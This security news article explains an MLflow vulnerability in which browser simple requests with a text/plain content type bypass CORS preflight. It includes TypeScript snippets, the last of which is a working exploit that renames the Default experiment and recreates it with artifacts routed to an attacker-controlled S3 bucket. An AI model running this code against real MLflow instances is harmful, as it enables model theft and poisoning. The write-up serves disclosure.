MLflow vulnerability enables remote machine learning model theft and poisoning
For example, if a piece of JavaScript code loaded inside a browser from domain A tries to make a request to domain B, the browser will first make a so-called preflight request to check whether domain B has a CORS policy that allows scripted requests from domain A. While this applies to localhost as well, Beeton points out that there is another type of request, called a simple request, that most browsers (with the exception of Safari) still allow without triggering a preflight because it predates CORS. Such requests are used, for example, by the <form> element from the HTML standard to submit data across origins, but they can also be triggered from JavaScript.
A simple request can use the GET, POST, or HEAD method and can have the content type application/x-www-form-urlencoded, multipart/form-data, or text/plain, or no content type at all. Its limitation, however, is that the script making it won't get any response back unless the target server opts in through the Access-Control-Allow-Origin header.
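To make the distinction concrete, here is a minimal browser-side sketch of both behaviors. The target URL is hypothetical, and the payloads are purely illustrative.

```ts
// Hypothetical cross-origin target; any other origin behaves the same way.
const url = "https://domain-b.example/endpoint";

// Not a simple request: application/json forces a preflight OPTIONS check,
// and the browser blocks the POST if domain B's CORS policy does not
// allow requests from domain A.
fetch(url, {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ key: "value" }),
});

// A simple request: sent immediately, with no preflight. The script cannot
// read the response unless the server sends Access-Control-Allow-Origin,
// but the request itself still reaches the server.
fetch(url, {
  method: "POST",
  mode: "no-cors", // we are not interested in reading the response
  headers: { "Content-Type": "text/plain" },
  body: "the body still arrives at the server",
});
```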
From an attack perspective, though, getting a response back is not actually required as long as the request triggers the intended action. This is the case for both the MLflow and Quarkus vulnerabilities.
Stealing and poisoning machine-learning models
Once MLflow is installed, its user interface is accessible by default at http://localhost:5000 and supports a REST API through which actions can be performed programmatically. Normally, API interaction would be done through POST requests with a content type of application/json, which is not among the content types allowed for simple requests.
However, Beeton found that MLflow's API did not check the content type of requests and accepted requests with a content type of text/plain. This, in turn, makes remote cross-origin attacks through the browser possible via simple requests.
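As a rough sketch of what that bypass looks like from an attacker-controlled page, the following request carries a JSON payload but declares it as text/plain, so the browser treats it as a simple request and sends it without a preflight. The endpoint path follows MLflow's documented REST API; the experiment name is illustrative.

```ts
// Runs in the victim's browser from an attacker-controlled page.
fetch("http://localhost:5000/api/2.0/mlflow/experiments/create", {
  method: "POST",
  mode: "no-cors", // the attacker never needs to read the response
  headers: { "Content-Type": "text/plain" }, // simple request: no preflight
  body: JSON.stringify({ name: "probe" }), // MLflow still parses this as JSON
});
```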
The API offers limited functionality, such as creating a new experiment or renaming an existing one, but not deleting experiments. Conveniently, the default experiment in MLflow to which new data is saved is called "Default," so attackers can first send a request renaming it to "Old" and then create a new experiment, which will now be called "Default" but have an artifact_uri pointing to an external S3 storage bucket they control.
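A rough sketch of that two-step hijack is shown below, assuming the victim's MLflow instance runs on its default port and the Default experiment has MLflow's usual experiment ID of "0". The endpoint paths and field names follow MLflow's documented REST API; the bucket name is hypothetical.

```ts
// Runs from an attacker-controlled page in the victim's browser.
const base = "http://localhost:5000/api/2.0/mlflow";

// Every call is shaped as a simple request: text/plain content type, so no
// preflight, and mode "no-cors" because the response is never needed.
const asSimpleRequest = (body: object): RequestInit => ({
  method: "POST",
  mode: "no-cors",
  headers: { "Content-Type": "text/plain" },
  body: JSON.stringify(body),
});

(async () => {
  // Step 1: rename the existing "Default" experiment out of the way.
  // "0" is MLflow's usual ID for the default experiment (an assumption here).
  await fetch(`${base}/experiments/update`, asSimpleRequest({
    experiment_id: "0",
    new_name: "Old",
  }));

  // Step 2: recreate "Default" with its artifacts stored in a bucket the
  // attacker controls, so models from future runs are uploaded there.
  await fetch(`${base}/experiments/create`, asSimpleRequest({
    name: "Default",
    artifact_location: "s3://attacker-controlled-bucket", // hypothetical
  }));
})();
```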